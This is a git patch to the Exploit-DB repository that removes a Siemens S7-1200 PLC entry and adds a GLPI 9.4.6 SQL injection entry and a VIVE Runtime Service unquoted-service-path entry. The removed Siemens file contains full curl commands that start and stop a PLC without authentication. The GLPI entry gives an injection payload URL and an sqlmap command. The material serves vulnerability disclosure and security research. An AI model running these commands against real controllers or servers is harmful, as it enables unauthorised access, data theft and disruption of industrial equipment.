From 2ad6c864512cee6b0821035605c4c5a403bba98e Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 15 Mar 2022 05:01:36 +0000
Subject: [PATCH] DB: 2022-03-15

4 changes to exploits/shellcodes

VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path

Siemens S7-1200 - Unauthenticated Start/Stop Command

Baixar GLPI Project 9.4.6 - SQLi
---
 exploits/hardware/remote/50820.txt  | 16 ----------------
 exploits/multiple/webapps/50823.txt | 13 +++++++++++++
 exploits/windows/local/50824.txt    | 28 ++++++++++++++++++++++++++++
 files_exploits.csv                  |  3 ++-
 4 files changed, 43 insertions(+), 17 deletions(-)
 delete mode 100644 exploits/hardware/remote/50820.txt
 create mode 100644 exploits/multiple/webapps/50823.txt
 create mode 100644 exploits/windows/local/50824.txt

diff --git a/exploits/hardware/remote/50820.txt b/exploits/hardware/remote/50820.txt
deleted file mode 100644
index 5f0eb57108..0000000000
--- a/exploits/hardware/remote/50820.txt
+++ /dev/null
@@ -1,16 +0,0 @@
-# Exploit Title: Unauthenticated Siemens S7-1200 CPU Start/Stop Command
-# Date: 09/03/2022
-# Exploit Author: RoseSecurity
-# Vendor Homepage: https://www.siemens.com/global/en.html
-# Version: V4.5 and below
-# Tested on: Siemens S7-1200 (CPU: 1215C)
-
-# IP == PLC IP address
-
-# Start Command
-
-curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http://<IP>/CPUCommands'
-
-# Stop Command
-
-curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http://<IP>/CPUCommands'
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50823.txt b/exploits/multiple/webapps/50823.txt
new file mode 100644
index 0000000000..5ee48c4530
--- /dev/null
+++ b/exploits/multiple/webapps/50823.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi
+# Date: 10/12
+# Exploit Author: Joas Antonio
+# Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/
+# Software Link: https://glpi-project.org/pt-br/baixar/
+# Version: GLPI - 9.4.6
+# Tested on: Windows/Linux
+# CVE : CVE-2021-44617
+
+#POC1:
+plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111
+
+sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"
\ No newline at end of file
diff --git a/exploits/windows/local/50824.txt b/exploits/windows/local/50824.txt
new file mode 100644
index 0000000000..7ae5f40f6f
--- /dev/null
+++ b/exploits/windows/local/50824.txt
@@ -0,0 +1,28 @@
+# Exploit Title: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path
+# Date: 11/03/2022
+# Exploit Author: Faisal Alasmari
+# Vendor Homepage: https://www.vive.com/
+# Software Link: https://developer.vive.com/resources/downloads/
+# Version: 1.0.0.4
+# Tested: Windows 10 x64
+
+
+
+C:\Users\User>sc qc "VIVE Runtime Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VIVE Runtime Service
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : VIVE Runtime Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index bb3d82f8b9..ec0ae086c4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11471,6 +11471,7 @@ id,file,description,date,author,type,platform,port
 50815,exploits/windows/local/50815.txt,"BattlEye 0.9 - 'BEService' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
 50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
+50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18646,7 +18647,6 @@ id,file,description,date,author,type,platform,port
 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware,
 50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
 50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
-50820,exploits/hardware/remote/50820.txt,"Siemens S7-1200 - Unauthenticated Start/Stop Command",1970-01-01,RoseSecurity,remote,hardware,
 50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
 50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
@@ -44892,3 +44892,4 @@ id,file,description,date,author,type,platform,port
 50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple,
 50809,exploits/linux/webapps/50809.py,"Webmin 1.984 - Remote Code Execution (Authenticated)",1970-01-01,faisalfs10x,webapps,linux,
 50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Hussien Misbah",webapps,php,
+50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple,